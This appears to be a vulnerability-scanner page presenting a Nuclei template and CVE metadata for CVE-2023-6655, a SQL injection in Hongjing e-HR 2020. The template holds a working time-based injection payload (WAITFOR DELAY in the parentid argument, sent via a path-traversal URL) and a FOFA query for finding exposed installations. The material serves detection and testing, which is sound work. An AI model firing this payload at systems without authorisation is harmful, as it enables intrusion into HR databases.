Hongjing e-HR 2020 - SQL Injection
CVE-2023-6655
Verified
Description
A vulnerability, which was classified as critical, has been found in Hongjing e-HR 2020. Affected by this issue is some unknown functionality of the file /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree of the component Login Interface. The manipulation of the argument parentid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247358 is the identifier assigned to this vulnerability.
Severity
High
CVSS Score
7.3
Exploit Probability
4%
Affected Product
e-hr
Published Date
October 16, 2025
Template Author
pussycat0x
CVE-2023-6655.yaml
id: CVE-2023-6655
info:
name: Hongjing e-HR 2020 - SQL Injection
author: pussycat0x
severity: high
description: |
A vulnerability, which was classified as critical, has been found in Hongjing e-HR 2020. Affected by this issue is some unknown functionality of the file /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree of the component Login Interface. The manipulation of the argument parentid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247358 is the identifier assigned to this vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-6655
- https://github.com/Gent5698/vulnerability/blob/main/%E5%AE%8F%E6%99%AF/CVE-2023-6655/README.md
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
cvss-score: 7.3
cve-id: CVE-2023-6655
cwe-id: CWE-89
epss-score: 0.03738
epss-percentile: 0.87499
cpe: cpe:2.3:a:hrp2000:e-hr:2020:*:*:*:*:*:*:*
metadata:
verified: true
vendor: hrp2000
product: e-hr
fofa-query: title="人力资源信息管理系统"
tags: cve,cve2023,hjsoft,management-system,sqli,vkev,vuln
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(body, '/hcm/themes/')"
condition: and
internal: true
- raw:
- |
GET /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree?isroot=child&parentid=1%27%3BWAITFOR+DELAY+%270%3A0%3A6%27--&kind=2&catalog_id=11&issuperuser=111&manageprive=111&action=111&target= HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
matchers:
- type: dsl
dsl:
- "duration >= 6"
# digest: 4a0a00473045022100b5d5b09152d852e73b5aef79f42e14bd9c12a44678a52df451afea6a193f8b6102200a320afa6aa384d99c76f93ad0005656e2f5f351eb0ef2d16c84c43e6b73b5f6:922c64590222798bb761d5b6d8e729507.3Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
CVE ID:
cve-2023-6655
CWE ID:
cwe-89